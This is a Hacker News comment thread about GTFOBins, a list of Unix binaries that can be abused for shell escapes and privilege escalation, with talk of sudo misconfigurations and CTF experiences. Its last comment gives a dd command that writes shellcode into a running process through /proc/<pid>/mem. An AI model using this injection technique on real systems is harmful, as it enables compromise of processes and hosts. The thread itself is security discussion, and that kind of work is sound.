GTFOBins - Hacker News

Posted by StefanBatory 7 hours ago

GTFOBins(gtfobins.org)

253 points | 64 commentspage 2

alex-moon 5 hours ago|

As someone who has had to do some grub editing on the computer in an AirBnB because peripherals were all messed up on the guest account (no internet, no sound, you could only see a tiny part of the screen, I honestly don't know how they had managed to do it) I am super pleased to see this resource. Stuff like this is a bit, you know, hopefully you never need this, but when you do, it is so useful to have it.

biosboiii 4 hours ago||

they should finetune the LLMs with this

Yokohiii 2 hours ago|

LLMs know pretty well about this. This is just a handy list for humans that want to do stuff.

npodbielski 6 hours ago||

Ok. It have hundrends o example for all sort of tools, 7z, dig, git. Those are very popular.

Question from security newbie. Why it is not used to hack all sort of servers all the time then?

dominicq 6 hours ago||

You need initial access. This is just a list of tools you can use if you can't spawn a standard interactive shell, for whatever reason.

It doesn't make it easier to "hack" servers, it's just a list of things that you could use once you're already inside.

asimovDev 5 hours ago|||

I think docker was used for these things before. I remember some big service had secrets in env vars and a shell access inside the docker image from a npm post install script let them evacuate these secrets

DaSHacka 6 hours ago|||

It's only relevant as a privilege escalation vector when you're able to execute those programs as root, but don't otherwise have root access on the server.

It's a pretty niche circumstance. Unless an admin allows users on a server to execute some of these random types of binaries as root, it's not going to be a concern. And, if it wasn't already obvious, distros are almost never configured this way OOTB

arcfour 6 hours ago||

I've seen plenty of servers in companies configured to allow sudoers to run a restricted subset of binaries as root, usually without a password. Some of them were GTFObins that the admins were not aware of until I reached out to let them know. I've also seen a couple of restricted shell setups where users could only run a handful of commands. Can't recall if I checked to see if any of them were GTFObins.

I wouldn't say this is the most useful h4x0r tool ever, but I wouldn't say it's particularly niche, either. This kinda stuff is definitely relevant in older large enterprise-type Linux/Unix environments.

pech0rin 6 hours ago|||

Because you have to have shell access to the server to use any of these.

olmo23 6 hours ago||

In certain circumstances, they might be :-)

But you can't "hack a server" using just these techniques: they would be a (small) part of a chain of exploits.

snvzz 4 hours ago||

The problem is ambient security, UNIX's security model.

Systems with capability-based security, such as seL4[0], do not suffer from this category of problem.

0. https://sel4.systems/About/

stackghost 6 hours ago||

These come up in CTFs all the time. One trick I don't see here is you can use `dd` to write into the `/proc` hierarchy to achieve all sorts of fuckery including patching shellcode into a running process.

mpeg 5 hours ago||

You learn the most random ways to abuse program features, one I still remember because of how long it took to figure it out was an htb box that (after a long exploitation path) used NTFS ADS to hide the flag within the alternate stream in a decoy file; and of course the normal way to extract the stream was disabled so had to do some black magic with other binaries to get it

saagarjha 6 hours ago|||

I don't think I've used any of these in a CTF tbh

stackghost 6 hours ago||

I've definitely used one or two in the last 6 months

saagarjha 6 hours ago||

For what kind of challenge? Most of these are not even available in CTF environments

mna_ 5 hours ago|||

I've used them for pwncollege CTFs but pwncollege is way below your level (I've seen some of your write ups before).

dominicq 6 hours ago||

Huh? How does that work exactly? I've heard of /proc fuckery before but didn't know you could disable aslr with it.

PhilipRoman 5 hours ago|||

If you have /proc available, you don't even need to disable ASLR (all mappings are available to you)

stackghost 6 hours ago|||

Hey you know what, I've used dd to write into process memory but haven't actually used it to disable KASLR, so it's possible I am misremembering. My bad.

dominicq 6 hours ago||

Sounds super 1337 and I hope it's actually possible somehow.

aa-jv 5 hours ago||

Parse /proc/<pid>/maps to find the relevant target_addr in your process-under-attack. And then its a matter of:

    $ dd if=shellcode.bin of=/proc/<pid>/mem bs=1 seek=$((target_addr)) ...